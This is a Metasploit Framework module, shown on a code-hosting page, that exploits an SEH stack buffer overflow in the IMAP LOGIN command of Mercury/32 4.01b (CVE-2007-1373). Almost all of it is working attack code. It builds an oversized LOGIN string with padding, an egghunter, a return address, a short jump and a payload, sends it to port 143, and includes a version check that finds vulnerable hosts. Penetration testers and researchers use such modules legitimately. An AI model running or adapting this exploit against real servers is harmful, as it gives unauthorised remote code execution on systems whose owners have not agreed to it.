Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/imap/mercury_login.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = NormalRanking
8
9
include Msf::Exploit::Remote::Tcp
10
include Msf::Exploit::Remote::Seh
11
include Msf::Exploit::Remote::Egghunter
12
13
def initialize(info = {})
14
super(
15
update_info(
16
info,
17
'Name' => 'Mercury/32 4.01 IMAP LOGIN SEH Buffer Overflow',
18
'Description' => %q{
19
This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD
20
LOGIN verb. By sending a specially crafted login command, a buffer
21
is corrupted, and code execution is possible. This vulnerability was
22
discovered by (mu-b at digit-labs.org).
23
},
24
'Author' => [
25
'mu-b', # Discovery and exploit
26
'MC', # Metasploit module
27
'Ivan Racic' # Automatic targeting + egg hunter
28
],
29
'License' => MSF_LICENSE,
30
'References' => [
31
['CVE', '2007-1373'],
32
['EDB', '3418']
33
],
34
'Privileged' => true,
35
'DefaultOptions' => {
36
'EXITFUNC' => 'thread'
37
},
38
'Payload' => {
39
'BadChars' => "\x00\x0a\x0d\x20",
40
'Space' => 2500
41
},
42
'Platform' => 'win',
43
'Targets' => [
44
[
45
'Windows Universal',
46
{
47
'Ret' => 0x00401460
48
}
49
]
50
],
51
'DisclosureDate' => '2007-03-06',
52
'DefaultTarget' => 0,
53
'Notes' => {
54
'Reliability' => UNKNOWN_RELIABILITY,
55
'Stability' => UNKNOWN_STABILITY,
56
'SideEffects' => UNKNOWN_SIDE_EFFECTS
57
}
58
)
59
)
60
register_options(
61
[
62
Opt::RPORT(143)
63
]
64
)
65
end
66
67
def check
68
connect
69
resp = sock.get_once
70
disconnect
71
return CheckCode::Vulnerable if resp =~ %r{Mercury/32 v4\.01[ab]}
72
73
Exploit::CheckCode::Safe
74
end
75
76
def exploit
77
hunter, egg = generate_egghunter(payload.encoded)
78
connect
79
sock.get_once
80
num = rand(255).to_i
81
sploit = 'A001 LOGIN ' + "\x20" * 1008 + "{#{num}}\n"
82
sploit << rand_text_alpha_upper(347)
83
sploit << egg + payload.encoded
84
sploit << rand_text_alpha_upper(7500 - payload.encoded.length - egg.length)
85
sploit << "\x74\x06\x75\x04" + [target.ret].pack('V')
86
sploit << make_nops(20)
87
sploit << hunter
88
sock.put(sploit)
89
sock.get_once
90
print_status("Sending payload (#{sploit.length} bytes) ...")
91
handler
92
disconnect
93
end
94
end
95
96